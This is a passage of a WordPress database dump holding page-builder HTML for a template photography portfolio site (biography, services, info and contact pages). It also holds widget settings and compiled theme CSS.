col-sm-12\">\r\n\r\n<hr></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-4 col-xs-12 col-sm-12\"></div>\r\n<div class=\"col-md-4 col-xs-12 col-sm-12\">\r\n\r\nMs. Dyson uses her minor in psychology to determine how to best approach her subjects and get inside their comfort zone without having them shut her out. This ability allows her to capture the magic of the moment in her special event photography and unique portraits, providing her clients with amazing images that delight them.\r\n\r\nShe has spent a significant time in the art photography trade, going to great lengths to take pictures that capture her client&acirc;&euro;&trade;s personality and spirit. With an adventurous spirit, she\'s taken photographs using a number of techniques including rappelling, skydiving, aerial photography and many more. Here are some of her wildest photo shoots:\r\n\r\n</div>\r\n<div class=\"col-md-2 col-xs-12 col-sm-6 text-center\">\r\n<div data-imhwpb-draggable=\"true\"><i class=\"fa fa-3x fa-bicycle\"> </i></div>\r\n<h5>Zion National Park, Utah</h5>\r\n<div data-imhwpb-draggable=\"true\"><i class=\"fa fa-3x fa-sun-o\"> </i></div>\r\n<h5>Sunset over Lake Michigan</h5>\r\n</div>\r\n<div class=\"col-md-2 col-xs-12 col-sm-6 text-center\">\r\n<div data-imhwpb-draggable=\"true\"><i class=\"fa fa-3x fa-university\"> </i></div>\r\n<h5>National Cathedral, Washington D.C.</h5>\r\n<div data-imhwpb-draggable=\"true\"><i class=\"fa fa-3x fa-diamond\"> </i></div>\r\n<h5>Malibu Beach Wedding, CA</h5>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<h2 class=\"\">Capturing the Magic</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n\r\n<hr></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-4 col-xs-12 col-sm-12\"></div>\r\n<div class=\"col-md-5 col-xs-12 col-sm-6\">\r\n\r\nMs. Dyson spent time in her undergraduate program pursuing a minor in psychology at an affiliated college. She looked into the psychology of personal space and boundaries to learn how to get inside of their comfort zone and capture the true wealth of their spirit. This allows her to get the magic of special events down on paper.\r\n\r\nMs. Dyson doesn\'t only limit her application of psychology to the magic she captures in her photography. She\'s also an avid volunteer in child abuse intervention services in her region.\r\n\r\n</div>\r\n<div class=\"col-md-3 col-xs-12 col-sm-6\">\r\n<h5>Client List</h5>\r\n<ul><li>Johnson Wedding Planning Services</li>\r\n 	<li>Beautiful Babies Boutique</li>\r\n 	<li>Fair River Art Show and Festival</li>\r\n 	<li>Pretty Woman Wedding Shows</li>\r\n 	<li>Amazing Grace Baby Services</li>\r\n 	<li>Mount Green Musical Festival</li>\r\n</ul></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<h2 class=\"\">Sample Pieces</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n\r\n<hr></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-4 col-xs-12 col-sm-12\"></div>\r\n<div class=\"col-md-2 col-sm-3 col-xs-6 text-center\">\r\n<p class=\"mod-img\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/c2c54aef-86c35b42-tomwang150500115-150x150.jpg\" alt=\"\" data-imhwpb-built-photo-search=\"16|square\" width=\"110\" class=\"wp-image-7197\"></p>\r\n<p class=\"mod-img\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/1c561c32-18eef2cc-dolgachov141001115-150x150.jpg\" alt=\"\" data-imhwpb-built-photo-search=\"16|square\" width=\"110\" class=\"wp-image-7198\"></p>\r\n\r\n</div>\r\n<div class=\"col-md-2 col-sm-3 col-xs-6 text-center\">\r\n<p class=\"mod-img\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/90a9d886-0a40cc08-kzenon130500354-150x150.jpg\" alt=\"\" data-imhwpb-built-photo-search=\"16|square\" width=\"110\" class=\"wp-image-7199\"></p>\r\n<p class=\"mod-img\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/562adcea-4ebea0b4-javiindy150400185-150x150.jpg\" alt=\"\" data-imhwpb-built-photo-search=\"16|square\" width=\"110\" class=\"wp-image-7200\"></p>\r\n\r\n</div>\r\n<div class=\"col-md-2 col-sm-3 col-xs-6 text-center\">\r\n<p class=\"mod-img\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/2287013a-abea336b-chagin120500586-150x150.jpg\" alt=\"\" data-imhwpb-built-photo-search=\"16|square\" width=\"110\" class=\"wp-image-7201\"></p>\r\n<p class=\"mod-img\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/120b8279-b2534a36-dolgachov151102499-150x150.jpg\" alt=\"\" data-imhwpb-built-photo-search=\"16|square\" width=\"110\" class=\"wp-image-7202\"></p>\r\n\r\n</div>\r\n<div class=\"col-md-2 col-sm-3 col-xs-6 text-center\">\r\n<p class=\"mod-img\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/aae58585-db58a13a-ryanking999150300180-150x150.jpg\" alt=\"\" data-imhwpb-built-photo-search=\"16|square\" width=\"110\" class=\"wp-image-7203\"></p>\r\n<p class=\"mod-img\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/2ce3357e-f8d3dacb-dolgachov150201359-150x150.jpg\" alt=\"\" data-imhwpb-built-photo-search=\"16|square\" width=\"110\" class=\"wp-image-7204\"></p>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\n\";s:14:\"checklist_html\";N;s:6:\"layout\";s:7:\"default\";s:19:\"has_page_containers\";s:1:\"1\";s:17:\"homepage_theme_id\";N;s:7:\"in_menu\";s:1:\"1\";s:10:\"menu_order\";s:1:\"5\";s:23:\"featured_image_asset_id\";N;s:11:\"is_readonly\";s:1:\"0\";s:8:\"is_posts\";s:1:\"0\";s:12:\"is_blog_post\";s:1:\"0\";}i:8;O:8:\"stdClass\":16:{s:2:\"id\";s:1:\"6\";s:16:\"page_revision_id\";s:4:\"1962\";s:10:\"page_title\";s:8:\"Services\";s:9:\"page_slug\";s:8:\"services\";s:9:\"post_type\";s:4:\"page\";s:4:\"code\";s:5992:\"\n<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row gridblock\">\r\n<div class=\"col-md-7 col-xs-12 col-sm-12\">\r\n<h2>A Magical Menu of Priceless Photographs</h2>\r\n<h4>Services Tailored to Your Needs</h4>\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n\r\n<hr></div>\r\n</div>\r\n</div>\r\n</div>\r\nBecause my clients often request a variety of services, I prefer to meet with clients and customize my packages to their needs. To meet these needs, I offer a wide variety of different services, either in package form or a la carte, so that clients who prefer to know exactly what they\'re purchasing have the information available. I also offer an hourly rate for clients who may have difficulty opening up to the inner beauty they want captured on paper. For clients who like my style but need photography services in a remote or distant location, I\'m willing to work out travel expenses.\r\n\r\nI also offer a wide variety of services related to photography. With an MFA in photography, I\'m well-qualified to teach at the collegiate level and have done so in the past at a variety of area colleges and universities.\r\n\r\nOther services I regularly offer my clients include digital touch-ups of red eyes and basic complexion smoothing, airbrushing extra pounds away, working with professionals to develop brand images that build the impression they\'re trying to create, teaching student models how to get the most out of their photo sessions and offering one-on-one sessions with photographers who are learning their own way to capture the magic that exists in their clients.\r\n\r\n</div>\r\n<div class=\"col-md-5 text-center col-xs-12 col-sm-12\">\r\n<p class=\"mod-img\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/fa8313e7-ead94077-dolgachov160303613.jpg\" alt=\"\" data-imhwpb-built-photo-search=\"16|square\" width=\"360\" class=\"wp-image-7205\"></p>\r\n\r\n</div>\r\n</div></div></div>\r\n<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\"></div>\r\n</div></div></div>\r\n<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\"></div>\r\n</div></div></div>\r\n<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row gridblock\">\r\n<div class=\"col-xs-12 col-sm-12 col-md-12\">\r\n<div class=\"mod-space\"></div>\r\n</div>\r\n</div></div></div>\r\n<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row gridblock\">\r\n<div class=\"col-md-12 text-center col-xs-12 col-sm-12\">\r\n<h2>My Available Services</h2>\r\n<h4>A Little Something for Everyone</h4>\r\nI offer a wide variety of photography-related services to meet your needs. If you need a service that isn\'t listed here, contact me. I\'ve worked on a variety of unique projects.\r\n\r\n</div>\r\n</div></div></div>\r\n<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row gridblock\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n\r\n<hr></div>\r\n</div>\r\n</div>\r\n</div></div></div>\r\n<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div class=\"mod-space\"></div>\r\n</div>\r\n</div></div></div>\r\n<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row gridblock\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-12\">\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-2 col-xs-12 col-sm-12\">\r\n<div class=\"text-center\" data-imhwpb-draggable=\"true\"><i class=\"fa fa-2x fa-diamond\"> </i></div>\r\n</div>\r\n<div class=\"col-md-10 col-xs-12 col-sm-12\">\r\n<div class=\"heading\">\r\n<h4 class=\"xs-center sm-center\">Integrated Wedding Photography</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-12\">\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-2 col-xs-12 col-sm-12\">\r\n<div class=\"text-center\" data-imhwpb-draggable=\"true\"><i class=\"fa fa-2x fa-child\"> </i></div>\r\n</div>\r\n<div class=\"col-md-10 col-xs-12 col-sm-12\">\r\n<div class=\"heading\">\r\n<h4 class=\"xs-center sm-center\">Beautiful Babies and Maternity Images</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div></div></div>\r\n<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row gridblock\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-12\">\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-2 col-xs-12 col-sm-12\">\r\n<div class=\"text-center\" data-imhwpb-draggable=\"true\"><i class=\"fa fa-2x fa-paint-brush\"> </i></div>\r\n</div>\r\n<div class=\"col-md-10 col-xs-12 col-sm-12\">\r\n<div class=\"heading\">\r\n<h4 class=\"xs-center sm-center\">Capturing the Magic of Art Shows</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-12\">\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-2 col-xs-12 col-sm-12\">\r\n<div class=\"text-center\" data-imhwpb-draggable=\"true\"><i class=\"fa fa-2x fa-graduation-cap\"> </i></div>\r\n</div>\r\n<div class=\"col-md-10 col-xs-12 col-sm-12\">\r\n<div class=\"heading\">\r\n<h4 class=\"xs-center sm-center\">Catching Special Graduation Moments</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div></div></div>\r\n<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row gridblock\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-12\">\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-2 col-xs-12 col-sm-12\">\r\n<div class=\"text-center\" data-imhwpb-draggable=\"true\"><i class=\"fa fa-2x fa-camera\"> </i></div>\r\n</div>\r\n<div class=\"col-md-10 col-xs-12 col-sm-12\">\r\n<div class=\"heading\">\r\n<h4 class=\"xs-center sm-center\">Going the Extra Mile for Amazing Photos</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-12\">\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-2 col-xs-12 col-sm-12\">\r\n<div class=\"text-center\" data-imhwpb-draggable=\"true\"><i class=\"fa fa-2x fa-bookmark\"> </i></div>\r\n</div>\r\n<div class=\"col-md-10 col-xs-12 col-sm-12\">\r\n<div class=\"heading\">\r\n<h4 class=\"xs-center sm-center\">Bringing Professionals Out of Their Shell</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div></div></div>\n\";s:14:\"checklist_html\";s:0:\"\";s:6:\"layout\";s:7:\"default\";s:19:\"has_page_containers\";s:1:\"1\";s:17:\"homepage_theme_id\";N;s:7:\"in_menu\";s:1:\"1\";s:10:\"menu_order\";s:1:\"6\";s:23:\"featured_image_asset_id\";N;s:11:\"is_readonly\";s:1:\"0\";s:8:\"is_posts\";s:1:\"0\";s:12:\"is_blog_post\";s:1:\"0\";}i:9;O:8:\"stdClass\":16:{s:2:\"id\";s:1:\"7\";s:16:\"page_revision_id\";s:4:\"2695\";s:10:\"page_title\";s:4:\"Info\";s:9:\"page_slug\";s:4:\"info\";s:9:\"post_type\";s:4:\"page\";s:4:\"code\";s:5652:\"\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-12 text-center col-xs-12 col-sm-12 text-center\">\r\n<h2>Capturing the Magic</h2>\r\n<h4>Curated Images You\'re Guaranteed to Love</h4>\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n\r\n<hr></div>\r\n</div>\r\n</div>\r\n</div>\r\nMy clients are often awe-struck when they get a chance to see their proofs. Because digital photography makes it inexpensive to capture many pictures in a setting, I go through hundreds of photographs, picking only the ones that really capture the magic of the event and the client\'s personality.\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div class=\"image-gallery\">\r\n<p class=\"mod-img\"><img class=\"alignnone size-full wp-image-7206\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/aHR0cHM6Ly9zb3VyY2UudW5zcGxhc2guY29tLzJxTFRfUnEtMnRrLzEyMDB4NDgw-imhwpb-ntmiz347g2anmcc.jpg\" alt=\"\" width=\"1200\" height=\"480\" data-imhwpb-asset-id=\"780384\"></p>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-2 col-sm-2 col-xs-4 text-center\">\r\n<p class=\"mod-img\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/14924764-9f4feead-auremar120620785-300x300.jpg\" alt=\"\" data-imhwpb-built-photo-search=\"16|square\" width=\"180\" class=\"wp-image-7207\"></p>\r\n\r\n</div>\r\n<div class=\"col-md-2 col-sm-2 col-xs-4 text-center\">\r\n<p class=\"mod-img\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/c39e0d37-becb6d66-pressmaster110300278-300x300.jpg\" alt=\"\" data-imhwpb-built-photo-search=\"16|square\" width=\"180\" class=\"wp-image-7208\"></p>\r\n\r\n</div>\r\n<div class=\"col-md-2 col-sm-2 col-xs-4 text-center\">\r\n<p class=\"mod-img\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/ba7dd51d-113ed3e6-nyul150300081-180x180.jpg\" alt=\"\" data-imhwpb-built-photo-search=\"16|square\" width=\"180\" class=\"wp-image-7209\"></p>\r\n\r\n</div>\r\n<div class=\"col-md-2 col-sm-2 col-xs-4 text-center\">\r\n<p class=\"mod-img\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/2f20b257-925bc946-oneinchpunch160500010-300x300.jpg\" alt=\"\" data-imhwpb-built-photo-search=\"16|square\" width=\"180\" class=\"wp-image-7210\"></p>\r\n\r\n</div>\r\n<div class=\"col-md-2 col-sm-2 col-xs-4 text-center\">\r\n<p class=\"mod-img\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/8a8b4299-4725b8e6-stockbroker150703279-300x300.jpg\" alt=\"\" data-imhwpb-built-photo-search=\"16|square\" width=\"180\" class=\"wp-image-7211\"></p>\r\n\r\n</div>\r\n<div class=\"col-md-2 col-sm-2 col-xs-4 text-center\">\r\n<p class=\"mod-img\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/811e6c56-c850d045-ammentorp160400139-300x300.jpg\" alt=\"\" data-imhwpb-built-photo-search=\"16|square\" width=\"180\" class=\"wp-image-7212\"></p>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-4 col-xs-12 col-sm-12\">\r\n<h2>How I Capture the Moment</h2>\r\n<h4>Keep the Client Comfortable</h4>\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n\r\n<hr></div>\r\n</div>\r\n</div>\r\n</div>\r\nBecause I\'ve spent a great deal of time working on the arts scene, I\'ve had plenty of time to study how people react to someone in their comfort zone.\r\n\r\nTowards that end, I\'ve created a way of getting close without making the photo\'s subjects uncomfortable. If it takes a minute or an hour to capture the perfect magic of your special moment, I\'ll find a way in without breaking the mood.\r\n\r\n</div>\r\n<div class=\"col-md-8 col-xs-12 col-sm-12\">\r\n<h2>A Study of Subjects</h2>\r\n<h4>Therapeutic Solutions for Capturing You At Your Best</h4>\r\n<div class=\"row gridblock\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n\r\n<hr></div>\r\n</div>\r\n</div>\r\n</div>\r\nAs an art photographer, I\'ve learned how to approach a subject from a number of different possible angles, both physically and figuratively.\r\n\r\nUnlike big-box photography studios, I work with my subject to make them comfortable so that they\'re willing to reveal that special magic to me. Instead of snapping the first picture of a child smiling, I look for more.\r\n\r\nI\'ve used play therapy to help children open up for their pictures, letting them show their real personality in the photographs I capture.\r\n\r\nI spend time before the wedding getting to know my clients so that their love shows through in photos that they\'ll adore because it captures their spirit.\r\n\r\nFamily portraits don\'t have to be staged and staid! I\'m willing to travel to your favorite place and catch your family at play.\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\n\";s:14:\"checklist_html\";s:0:\"\";s:6:\"layout\";s:7:\"default\";s:19:\"has_page_containers\";s:1:\"1\";s:17:\"homepage_theme_id\";N;s:7:\"in_menu\";s:1:\"1\";s:10:\"menu_order\";s:1:\"7\";s:23:\"featured_image_asset_id\";N;s:11:\"is_readonly\";s:1:\"0\";s:8:\"is_posts\";s:1:\"0\";s:12:\"is_blog_post\";s:1:\"0\";}i:10;O:8:\"stdClass\":16:{s:2:\"id\";s:1:\"2\";s:16:\"page_revision_id\";s:4:\"1516\";s:10:\"page_title\";s:10:\"Contact Us\";s:9:\"page_slug\";s:10:\"contact-us\";s:9:\"post_type\";s:4:\"page\";s:4:\"code\";s:646:\"\n<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\">\r\n<div class=\"col-md-8 col-sm-8 col-xs-12\">\r\n<p>Please use the contact form below, if you have any general questions or requests about our services.</p>\r\n<p>We will try our best to respond back to you within 24 hours.</p>\r\n\r\n[wpforms id=\"11\"]\r\n\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12\">\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<p class=\"mod-reset\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/5494696c-c578f212-appalachianviews140800062.jpg\" alt=\"\" data-imhwpb-built-photo-search=\"52|portrait\" width=\"360\" class=\"wp-image-7213\"></p>\r\n\r\n</div></div></div></div>\n\";s:14:\"checklist_html\";s:0:\"\";s:6:\"layout\";s:7:\"default\";s:19:\"has_page_containers\";s:1:\"1\";s:17:\"homepage_theme_id\";N;s:7:\"in_menu\";s:1:\"1\";s:10:\"menu_order\";s:2:\"99\";s:23:\"featured_image_asset_id\";N;s:11:\"is_readonly\";s:1:\"0\";s:8:\"is_posts\";s:1:\"0\";s:12:\"is_blog_post\";s:1:\"0\";}}s:10:\"additional\";a:0:{}}}','yes'),(716,'boldgrid_has_built_site','yes','yes'),(720,'boldgrid_easy_seo_version','1.6.13','no'),(721,'widget_wpforms-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(722,'widget_black-studio-tinymce','a:2:{i:1;a:5:{s:5:\"title\";s:14:\"Call To Action\";s:4:\"text\";s:982:\"<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 0px;\">\r\n<div class=\"col-md-12 col-sm-6 col-xs-12 color1-border-color\" style=\"border-width: 7px;\">\r\n<p class=\"color1-color\" style=\"font-size: 32px; text-align: left;\"><span style=\"color: #ffffff; line-height: 3em;\">Discover Your True Identity.</span></p>\r\n<p class=\"color1-color\" style=\"font-size: 22px; text-align: left;\"><span style=\"color: #ffffff;\"><strong><span style=\"font-size: 52px;\">It\'s The Adventure</span></strong></span></p>\r\n<p class=\"color1-color\" style=\"font-size: 22px; text-align: left;\"><span style=\"color: #ffffff;\"><strong><span style=\"font-size: 52px;\">Of A Lifetime.</span></strong></span></p>\r\n</div>\r\n<p><img class=\"alignnone wp-image-28862 alignleft\" style=\"margin-left: 12.5em; margin-top: 2em;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/ek-logo-white-med.png\" alt=\"\" width=\"73\" height=\"72\" /></p>\r\n</div>\r\n</div>\r\n</div>\";s:4:\"type\";s:4:\"html\";s:6:\"filter\";s:1:\"1\";s:5:\"label\";s:20:\"black-studio-tinymce\";}s:12:\"_multiwidget\";i:1;}','yes'),(723,'boldgrid_widgets_created','a:2:{s:12:\"contact_info\";s:22:\"black-studio-tinymce-0\";s:14:\"call_to_action\";s:22:\"black-studio-tinymce-1\";}','yes'),(724,'boldgrid_menus_created','a:2:{i:8;s:6:\"social\";s:14:\"option_version\";i:2;}','yes'),(733,'_amn_wpforms-lite_to_check','1576704237','yes'),(744,'wpforms_review','a:2:{s:4:\"time\";i:1563397084;s:9:\"dismissed\";b:1;}','yes'),(962,'boldgrid_customizer_first_use','2019-07-03 16:25:54','yes'),(1578,'boldgrid_inspirations_previous_version','2.6.5','no'),(1679,'boldgrid_get_unfiltered_option','false','yes'),(1684,'boldgrid_gallery_current_version','1.5','yes'),(2287,'theme_mods_boldgrid-hydra','a:39:{s:20:\"force_scss_recompile\";a:2:{s:6:\"active\";b:0;s:7:\"staging\";b:1;}s:21:\"boldgrid_compiled_css\";s:11317:\".color1-text-default{color:#333}.color-1-text-contrast{color:#333 ! important}.color-1-text-contrast-hover:hover,.color-1-text-contrast-hover:focus{color:#333 ! important}.color2-text-default{color:#fff}.color-2-text-contrast{color:#fff ! important}.color-2-text-contrast-hover:hover,.color-2-text-contrast-hover:focus{color:#fff ! important}.color3-text-default{color:#fff}.color-3-text-contrast,.color-3-text-contrast-hover:hover{color:#fff ! important}.color1-color{color:#fff ! important}.color1-color-hover:focus,.color1-color-hover:hover{color:#fff ! important}.color2-color{color:#2964db ! important}.color2-color-hover:focus,.color2-color-hover:hover{color:#2964db ! important}.color3-color{color:#3e3e3e ! important}.color3-color-hover:focus,.color3-color-hover:hover{color:#3e3e3e ! important}.color1-background{background:#fff ! important}.color1-background-hover:focus,.color1-background-hover:hover{background:#fff ! important}.color2-background{background:#2964db ! important}.color2-background-hover:focus,.color2-background-hover:hover{background:#2964db ! important}.color3-background{background:#3e3e3e ! important}.color3-background-hover:focus,.color3-background-hover:hover{background:#3e3e3e ! important}.color1-background-color{background-color:#fff ! important}.color1-background-color-hover:focus,.color1-background-color-hover:hover{background-color:#fff ! important}.color2-background-color{background-color:#2964db ! important}.color2-background-color-hover:focus,.color2-background-color-hover:hover{background-color:#2964db ! important}.color3-background-color{background-color:#3e3e3e ! important}.color3-background-color-hover:focus,.color3-background-color-hover:hover{background-color:#3e3e3e ! important}.color1-border-color{border-color:#fff ! important}.color1-border-color-hover:focus,.color1-border-color-hover:hover{border-color:#fff ! important}.color2-border-color{border-color:#2964db ! important}.color2-border-color-hover:focus,.color2-border-color-hover:hover{border-color:#2964db ! important}.color3-border-color{border-color:#3e3e3e ! important}.color3-border-color-hover:focus,.color3-border-color-hover:hover{border-color:#3e3e3e ! important}.breadcrumb li a.filler{background:#2964db;color:#fff}.breadcrumb li a.filler:after{border-left-color:#2964db}.breadcrumb li a:not(.filler){color:#333}.breadcrumb li a:not(.filler):after{border-left-color:#fff !important}.breadcrumb li a:not(.filler):hover,.breadcrumb li a:not(.filler):focus{background:#2964db;color:#fff}.breadcrumb li a:not(.filler):hover:after,.breadcrumb li a:not(.filler):focus:after{border-left-color:#2964db !important;color:#fff}.woocommerce div.product .stock,.woocommerce div.product span.price,.woocommerce div.product p.price{color:#fff}.wc-image-links .gallery-caption,.wc-gallery-captions-show .gallery-caption,.wc-gallery-captions-onhover .gallery-caption,.wc-gallery-captions-showon .gallery-caption{background-color:#3e3e3e;color:#fff}.wc-image-links .gallery-caption > *,.wc-gallery-captions-show .gallery-caption > *,.wc-gallery-captions-onhover .gallery-caption > *,.wc-gallery-captions-showon .gallery-caption > *{color:#fff}.btn-color-1,.btn-color-1-flat{background-color:#fff;border-color:#fff;color:#333 !important}.btn-color-1:visited,.btn-color-1-flat:visited{color:#333}.btn-color-1:hover,.btn-color-1-flat:hover,.btn-color-1:focus,.btn-color-1-flat:focus{background-color:#fff;border-color:#fff;color:#333 !important}.btn-color-1:active,.btn-color-1-flat:active,.btn-color-1.active,.btn-color-1-flat.active,.btn-color-1.is-active,.btn-color-1-flat.is-active{background-color:#fff;border-color:#fff;color:#e6e6e6 !important}.btn-color-2,.btn-color-2-flat{background-color:#2964db;border-color:#2964db;color:#fff !important}.btn-color-2:visited,.btn-color-2-flat:visited{color:#fff}.btn-color-2:hover,.btn-color-2-flat:hover,.btn-color-2:focus,.btn-color-2-flat:focus{background-color:#5584e2;border-color:#5584e2;color:#fff !important}.btn-color-2:active,.btn-color-2-flat:active,.btn-color-2.active,.btn-color-2-flat.active,.btn-color-2.is-active,.btn-color-2-flat.is-active{background-color:#3668cf;border-color:#3668cf;color:#1e4fb3 !important}.btn-color-3,.btn-color-3-flat{background-color:#3e3e3e;border-color:#3e3e3e;color:#fff !important}.btn-color-3:visited,.btn-color-3-flat:visited{color:#fff}.btn-color-3:hover,.btn-color-3-flat:hover,.btn-color-3:focus,.btn-color-3-flat:focus{background-color:#585858;border-color:#585858;color:#fff !important}.btn-color-3:active,.btn-color-3-flat:active,.btn-color-3.active,.btn-color-3-flat.active,.btn-color-3.is-active,.btn-color-3-flat.is-active{background-color:#3e3e3e;border-color:#3e3e3e;color:#252525 !important}.palette-primary{color:#333;}.palette-primary .site-header,.palette-primary .well{background:rgba(255, 255, 255, 0.8);color:#333}.palette-primary .page-bg,.palette-primary .entry-content,.palette-primary .site-footer,.palette-primary #boldgrid-sticky-push,.palette-primary #boldgrid-sticky-filler,.palette-primary .panel-default > .panel-heading,.palette-primary .panel-body,.palette-primary .panel-footer{background:#fff;color:#333}.palette-primary .attribution-theme-mods a,.palette-primary .navbar-default .navbar-toggle:hover,.palette-primary .navbar-default .navbar-toggle:focus,.palette-primary #reviews #comments ol.commentlist li .meta{color:#333}.palette-primary .gridblock 